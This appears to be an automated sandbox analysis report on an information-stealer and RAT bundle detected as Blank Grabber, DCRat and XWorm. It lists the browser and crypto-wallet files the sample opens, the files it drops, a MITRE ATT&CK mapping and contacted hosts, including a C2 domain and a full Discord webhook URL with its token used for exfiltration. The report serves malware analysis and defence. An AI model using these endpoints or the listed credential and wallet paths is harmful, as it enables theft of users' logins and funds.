Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\3561288849sdhlie.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\tmp	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean\db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\datareporting\glean	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Built.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior

Source: Yara match	File source: 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Built.exe PID: 6252, type: MEMORYSTR

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000001.00000003.1694117012.0000021AFD7E2000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1694117012.0000021AFD7E4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2039099236.000001D5E543D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2044988852.000001D5E5020000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2029505952.000001D5E6183000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2035836310.000001D5E542F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.1722583817.000001D5E51D7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2038832287.000001D5E5438000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.2050287577.000001D5E543E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000003.2032955728.000001D5E542F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Built.exe PID: 6496, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Built.exe PID: 6252, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI64962\rarreg.key, type: DROPPED

Yara detected DCRat

Source: Yara match	File source: 00000039.00000002.2145328378.0000000002852000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000037.00000002.2144420087.00000000031E2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2143786130.00000000031C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2143786130.0000000003202000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000033.00000002.2143786130.00000000031FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1871672428.00000000035BD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000002.2132843674.0000000002412000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2145328378.0000000002801000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003B.00000002.2149228048.0000000002D70000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000037.00000002.2144420087.0000000003191000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000003B.00000002.2149228048.0000000002D38000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000039.00000002.2145328378.0000000002848000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000034.00000002.2132843674.00000000023C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000026.00000002.1871672428.00000000032F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: comReviewsession.exe PID: 7476, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dasHost.exe PID: 7324, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dasHost.exe PID: 8064, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: dwm.exe PID: 8060, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iKSiRODBDWoPAMSDKBDQBFN.exe PID: 7568, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: iKSiRODBDWoPAMSDKBDQBFN.exe PID: 7776, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: Built.exe PID: 6252, type: MEMORYSTR

Yara detected XWorm

Source: Yara match	File source: Vjy8d2EoqK.exe, type: SAMPLE
Source: Yara match	File source: 4.0.S l r .exe.409294.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.S l r .exe.569e78.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Vjy8d2EoqK.exe.e954a4.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.S l r .exe.409294.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.3.S l r .exe.569e78.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.0.XClient.exe.d70000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Vjy8d2EoqK.exe.e8248c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Vjy8d2EoqK.exe.e954a4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Vjy8d2EoqK.exe.e8fa8c.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.3.Vjy8d2EoqK.exe.e8248c.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.Vjy8d2EoqK.exe.b2d3b7.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 4.0.S l r .exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.Vjy8d2EoqK.exe.adfe9c.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.Vjy8d2EoqK.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.Vjy8d2EoqK.exe.40936c.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000003.1696194497.0000000000E81000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000000.1696061537.0000000000409000.00000002.00000001.01000000.0000000C.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000003.1709553123.000000000055D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000000.1682604318.0000000000408000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000000.1709097022.0000000000D72000.00000002.00000001.01000000.0000000F.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Vjy8d2EoqK.exe PID: 2596, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: S l r .exe PID: 5768, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: XClient.exe PID: 7216, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Roaming\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\XClient.exe, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\S l r .exe, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	111 Scripting	Valid Accounts	221 Windows Management Instrumentation	111 Scripting	1 DLL Side-Loading	1 File and Directory Permissions Modification	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 Data Encrypted for Impact
Credentials	Domains	Default Accounts	1 Native API	1 DLL Side-Loading	11 Process Injection	31 Disable or Modify Tools	LSASS Memory	3 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	113 Command and Scripting Interpreter	421 Registry Run Keys / Startup Folder	421 Registry Run Keys / Startup Folder	11 Deobfuscate/Decode Files or Information	Security Account Manager	47 System Information Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Non-Standard Port	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	Login Hook	Login Hook	21 Obfuscated Files or Information	NTDS	361 Security Software Discovery	Distributed Component Object Model	Input Capture	4 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	221 Software Packing	LSA Secrets	2 Process Discovery	SSH	Keylogging	15 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	151 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	223 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Modify Registry	Proc Filesystem	1 Remote System Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	151 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	11 Process Injection	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Vjy8d2EoqK.exe	92%	ReversingLabs	Win32.Backdoor.DCRat
Vjy8d2EoqK.exe	84%	Virustotal		Browse
Vjy8d2EoqK.exe	100%	Avira	VBS/Runner.VPG
Vjy8d2EoqK.exe	100%	Avira	VBS/Runner.VPG
Vjy8d2EoqK.exe	100%	Avira	TR/Spy.Gen
Vjy8d2EoqK.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe	100%	Avira	HEUR/AGEN.1323984
C:\Brokercrt\comReviewsession.exe	100%	Avira	HEUR/AGEN.1323984
C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe	100%	Avira	HEUR/AGEN.1323984
C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe	100%	Avira	HEUR/AGEN.1323984
C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe	100%	Avira	HEUR/AGEN.1323984
C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe	100%	Avira	HEUR/AGEN.1323984
C:\Brokercrt\aIVfHknoFLGNu6gLK6xZar0.vbe	100%	Avira	VBS/Runner.VPG
C:\Recovery\powershell.exe	100%	Avira	HEUR/AGEN.1323984
C:\Users\user\AppData\Local\Temp\XClient.exe	100%	Avira	TR/Spy.Gen
C:\Users\user\AppData\Local\Temp\S l r .exe	100%	Avira	TR/Spy.Gen
C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe	100%	Joe Sandbox ML
C:\Brokercrt\comReviewsession.exe	100%	Joe Sandbox ML
C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe	100%	Joe Sandbox ML
C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe	100%	Joe Sandbox ML
C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe	100%	Joe Sandbox ML
C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe	100%	Joe Sandbox ML
C:\Recovery\powershell.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\XClient.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\S l r .exe	100%	Joe Sandbox ML
C:\Brokercrt\comReviewsession.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Brokercrt\iKSiRODBDWoPAMSDKBDQBFN.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Program Files (x86)\jDownloader\iKSiRODBDWoPAMSDKBDQBFN.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Program Files\7-Zip\Lang\iKSiRODBDWoPAMSDKBDQBFN.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Program Files\Windows Security\BrowserCore\en-US\dwm.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Recovery\powershell.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Users\Default\AppData\Roaming\Microsoft\Windows\Templates\iKSiRODBDWoPAMSDKBDQBFN.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Users\user\AppData\Local\Temp\Built.exe	39%	ReversingLabs	Win64.Trojan.Dacic
C:\Users\user\AppData\Local\Temp\S l r .exe	96%	ReversingLabs	Win32.Trojan.Dorv
C:\Users\user\AppData\Local\Temp\SolaraBootstrapper.exe	33%	ReversingLabs	Win32.PUA.Packunwan
C:\Users\user\AppData\Local\Temp\XClient.exe	92%	ReversingLabs	ByteCode-MSIL.Backdoor.XWormRAT
C:\Users\user\AppData\Local\Temp\_MEI64962\VCRUNTIME140.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI64962\_bz2.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI64962\_ctypes.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI64962\_decimal.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI64962\_hashlib.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI64962\_lzma.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI64962\_queue.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI64962\_socket.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI64962\_sqlite3.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI64962\_ssl.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI64962\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI64962\libffi-8.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI64962\libssl-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI64962\python311.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI64962\rar.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI64962\select.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI64962\sqlite3.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\_MEI64962\unicodedata.pyd	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\svchosts.exe	79%	ReversingLabs	ByteCode-MSIL.Trojan.Uztuby
C:\Users\user\AppData\Roaming\XClient.exe	92%	ReversingLabs	ByteCode-MSIL.Backdoor.XWormRAT
C:\Windows\SysWOW64\it-IT\dasHost.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Windows\addins\cmd.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat
C:\Windows\apppatch\en-US\conhost.exe	88%	ReversingLabs	ByteCode-MSIL.Backdoor.DCRat

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
github.com	0%	Virustotal	Browse
raw.githubusercontent.com	0%	Virustotal	Browse
ip-api.com	0%	Virustotal	Browse
discordapp.com	0%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://www.leboncoin.fr/	0%	URL Reputation	safe
https://www.msn.com	0%	URL Reputation	safe
https://nuget.org/nuget.exe	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	URL Reputation	safe
https://www.amazon.com/	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://httpbin.org/	0%	URL Reputation	safe
http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s	0%	URL Reputation	safe
http://www.cl.cam.ac.uk/~mgk25/iso-time.html	0%	URL Reputation	safe
https://www.ecosia.org/newtab/	0%	URL Reputation	safe
http://hg.python.org/cpython/file/603b4d593758/Lib/socket.py#l535	0%	URL Reputation	safe
https://MD8.mozilla.org/1/m	0%	URL Reputation	safe
https://bugzilla.mo	0%	URL Reputation	safe
http://tools.ietf.org/html/rfc6125#section-6.4.3	0%	URL Reputation	safe
http://schemas.xmlsoap.org/wsdl/	0%	URL Reputation	safe
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	0%	URL Reputation	safe
http://www.phys.uu.nl/~vgent/calendar/isocalendar.htm	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser	0%	Avira URL Cloud	safe
https://account.bellmedia.c	0%	URL Reputation	safe
https://login.microsoftonline.com	0%	URL Reputation	safe
http://crl.thawte.com/ThawteTimestampingCA.crl0	0%	URL Reputation	safe
http://www.iana.org/time-zones/repository/tz-link.html	0%	URL Reputation	safe
https://duckduckgo.com/chrome_newtab	0%	Avira URL Cloud	safe
https://github.com/Blank-c/BlankOBF	0%	Avira URL Cloud	safe
https://github.com/solutions/industries/financial-services	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Avira URL Cloud	safe
https://www.wykop.pl/	0%	URL Reputation	safe
https://twitter.com/	0%	URL Reputation	safe
https://www.olx.pl/	0%	URL Reputation	safe
https://github.githubassets.com/assets/github-mark-57519b92ca4e.png	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_	0%	Avira URL Cloud	safe
https://duckduckgo.com/ac/?q=	0%	Virustotal		Browse
https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo	0%	Avira URL Cloud	safe
https://github.com/solutions/devsecops	0%	Avira URL Cloud	safe
https://duckduckgo.com/chrome_newtab	0%	Virustotal		Browse
https://github.com/Blank-c/BlankOBF	2%	Virustotal		Browse
https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txt	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/vendors-node_modules_clsx_dist_clsx_m_js-node_modules_primer_	0%	Virustotal		Browse
https://github.com/features/code-review	0%	Avira URL Cloud	safe
https://github.com/solutions/industries/financial-services	1%	Virustotal		Browse
https://github.githubassets.com/assets/vendors-node_modules_braintree_browser-detection_dist_browser	0%	Virustotal		Browse
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	0%	Avira URL Cloud	safe
https://github.com/solutions/devsecops	1%	Virustotal		Browse
https://github.com/features	0%	Avira URL Cloud	safe
https://user-images.githubusercontent.com/	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/github-mark-57519b92ca4e.png	0%	Virustotal		Browse
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	0%	Avira URL Cloud	safe
https://github.com/features	1%	Virustotal		Browse
https://github.com/features/code-review	1%	Virustotal		Browse
https://github.githubassets.com/assets/vendors-node_modules_github_remote-form_dist_index_js-node_mo	1%	Virustotal		Browse
https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_	0%	Avira URL Cloud	safe
https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txt	1%	Virustotal		Browse
https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py#	0%	Virustotal		Browse
https://github.com/solutions/industries/manufacturing	0%	Avira URL Cloud	safe
https://api.anonfiles.com/upload	0%	Avira URL Cloud	safe
https://docs.python.org/3.11/library/binascii.html#binascii.a2b_base64	0%	Virustotal		Browse
https://github.githubassets.com/assets/vendors-node_modules_github_mini-throttle_dist_index_js-node_	1%	Virustotal		Browse
https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.css	0%	Avira URL Cloud	safe
https://api.github.com/_private/browser/stats	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_	0%	Avira URL Cloud	safe
https://api.anonfiles.com/upload-	0%	Avira URL Cloud	safe
https://discord.com/api/v9/users/	0%	Avira URL Cloud	safe
https://api.anonfiles.com/upload-	1%	Virustotal		Browse
https://api.anonfiles.com/upload	1%	Virustotal		Browse
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	0%	Avira URL Cloud	safe
https://github.com/solutions/industries/manufacturing	1%	Virustotal		Browse
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	0%	Avira URL Cloud	safe
https://github.com/urllib3/urllib3/issues/2192#issuecomment-821832963	0%	Virustotal		Browse
https://user-images.githubusercontent.com/	0%	Virustotal		Browse
https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-89a69c248502.js	0%	Avira URL Cloud	safe
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/dark_dimmed-aa16bfa90fb8.css	0%	Virustotal		Browse
https://api.github.com/_private/browser/stats	0%	Virustotal		Browse
https://docs.github.com/get-started/accessibility/keyboard-shortcuts	0%	Avira URL Cloud	safe
https://urllib3.readthedocs.io/en/latest/advanced-usage.html#https-proxy-error-http-proxy	0%	Virustotal		Browse
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/element-registry-d3ba3606e12c.js	0%	Avira URL Cloud	safe
https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader	0%	Virustotal		Browse
https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-89a69c248502.js	0%	Virustotal		Browse
https://github.com/features/packages	0%	Avira URL Cloud	safe
https://docs.github.com/get-started/accessibility/keyboard-shortcuts	0%	Virustotal		Browse
https://github.githubassets.com/assets/ui_packages_react-core_create-browser-history_ts-ui_packages_	0%	Virustotal		Browse
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js	0%	Avira URL Cloud	safe
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	0%	Virustotal		Browse
https://discord.com/api/v9/users/	0%	Virustotal		Browse
https://github.githubassets.com/assets/vendors-node_modules_delegated-events_dist_index_js-node_modu	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/vendors-node_modules_oddbird_popover-polyfill_dist_popover_js	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	1%	Virustotal		Browse
https://github.com/features/packages	1%	Virustotal		Browse
https://github.com/trending	0%	Avira URL Cloud	safe
https://api.anonfiles.com/uploadr	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/element-registry-d3ba3606e12c.js	0%	Virustotal		Browse
https://google.com/mail	0%	Avira URL Cloud	safe
https://api.github.com/_private/browser/errors	0%	Avira URL Cloud	safe
https://github.com/urllib3/urllib3/issues/2513#issuecomment-1152559900.	0%	Avira URL Cloud	safe
https://github.githubassets.com/assets/vendors-node_modules_primer_react_lib-esm_ActionList_index_js	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
cash-spoken.gl.at.ply.gg	147.185.221.21	true	true		unknown
github.com	140.82.121.4	true	false	0%, Virustotal, Browse	unknown
raw.githubusercontent.com	185.199.108.133	true	false	0%, Virustotal, Browse	unknown
ip-api.com	208.95.112.1	true	true	0%, Virustotal, Browse	unknown
discordapp.com	162.159.135.233	true	true	0%, Virustotal, Browse	unknown
blank-curro.in	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://raw.githubusercontent.com/quivings/Solara/main/Storage/version.txt	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://discordapp.com/api/webhooks/1255594789861195827/8s6rt3E8edVCsvsaavUpcA9mRxd3KM7eS7ju4bkPhLPkUvlnCQyyUrBISoboFGoSAAiq	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	Built.exe, 00000003.00000003.2032723653.000001D5E551B000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
